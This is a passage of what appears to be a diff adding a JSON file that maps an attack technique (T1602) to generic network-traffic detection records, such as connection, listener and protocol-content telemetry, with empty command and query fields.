This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "file transfer traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "web traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "remote code execution traffic" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1602", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "administration traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "dns traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "encrypted traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network traffic content", + "description": "Information about the content of network packets and the protocols associated to them, either captured on the wire or on an endpoint.", + "source_data_element": "network traffic", + "relationship": "contained", + "target_data_element": "mail traffic" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
